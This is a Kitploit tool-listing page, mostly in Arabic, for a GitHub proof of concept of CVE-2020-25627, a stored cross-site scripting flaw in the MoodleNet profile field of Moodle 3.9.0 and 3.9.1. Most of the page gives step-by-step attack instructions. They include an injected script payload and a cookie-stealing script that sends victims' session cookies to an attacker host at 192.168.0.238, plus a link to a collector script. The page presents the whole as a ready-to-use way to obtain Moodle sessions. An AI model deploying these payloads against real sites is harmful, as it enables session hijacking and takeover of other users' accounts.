Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-25627 — XSS مخزّن عبر معامل moodlenetprofile في الملف الشخصي للمستخدم | Kitploit
أدوات/GitHubGitHub/hoangkien1020/cve-2020-25627
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubhoangkien1020/cve-2020-25627

CVE-2020-25627

XSS مخزّن عبر معامل moodlenetprofile في الملف الشخصي للمستخدم

عرض المستودع
3منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-25627

XSS مخزّن عبر وسيط moodlenetprofile في ملف تعريف المستخدم

إثبات المفهوم الخاص بي حول هذا CVE

متطلبات المستخدم: طالب (أو الموقع للتسجيل)

XSS في moodlenetprofile

root@kitploit:~
Step 1: Log in with an authenticated user (Can register or through creating a new user without assigning roles )

Step 2: Quick access to Edit profile

domain/moodle/user/edit.php?id=<your user_id>&returnto=profile

In MoodleNet profile, add the script as:

<script>alert("HK")</script>

And save:

Step 3: Anytime, the other user goes to view your profile, the stored XSS will trigger.

Steal cookie via script:

<script>var i=new Image;i.src="http://192.168.0.238/xss.php?"+document.cookie;</script>

Change your domain and upload xss.php to your host:

https://github.com/HoangKien1020/pentest/tree/master/XSS

Done. You can view log.txt to get Moodle session.

moodlenetprofile parameter

الإصدارات المتأثرة: 3.9.0 , 3.9.1

المصدر

https://moodle.org/mod/forum/discuss.php?d=410839

تأثير XSS (سرقة ملفات تعريف الارتباط،...)، انظر هنا:

https://github.com/HoangKien1020/pentest/tree/master/XSS

تنزيل الأداة